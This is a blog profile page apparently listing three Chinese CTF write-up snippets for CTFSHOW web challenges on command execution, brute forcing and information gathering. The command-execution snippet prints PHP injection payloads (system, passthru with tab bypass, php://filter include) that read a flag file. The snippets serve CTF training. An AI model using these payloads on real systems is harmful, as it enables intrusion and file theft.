- 博客(3)
- 收藏
- 关注
原创 CTFSHOW web入门 29-36 命令执行
CTFSHOW web入门 29-36 命令执行Web29?c=system("tac f*");Web30?c=passthru('tac f*');Web31?c=passthru("tac%09fl*");Web32?c=include"$_POST[1]"?>POST:1=php://filter/read=convert.base64-encode/resource=flag.phpWeb33-36<?phperror_reporting(0);i
2021-12-28 22:52:57 139
原创 CTFSHOW web入门 爆破 21-28
CTFSHOW 爆破 [21-28]Web21可以看到 SELECTED TEXT -> DECODED FROM 用Base64解码账号密码的格式是 [username]:[password]所以我们可以用 intruder模块里面的自定义payloadposition 1: adminposition 2: ( : ) 是冒号,不需要用括号哈(方便看清楚)position 3: 可以用题目的字典(其实字典才是最重要)payload processing 使用Base
2021-12-11 18:07:36 2778
原创 CTFSHOW web入门 1-20 信息收集 [VIP题目限免]
@TOCCTFSHOW web入门 1-20 信息收集每天都会更新,当作复习用了。1.源码泄露这题直接按F12就好了,然后注释部分用Base64解密一下。2.前台JS绕过这题也挺简单 有两个方法:直接ctrl + u在网址前面加view-source:当然也可以burpsuite 截断流量抓包3.协议头信息泄露有两个方法:burpsuite抓包在游览器 按F12 -> 网络 -> 找加载的文件 -> 里面有 header 信息 flag就在里面4. rob
2021-12-06 17:04:38 561
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人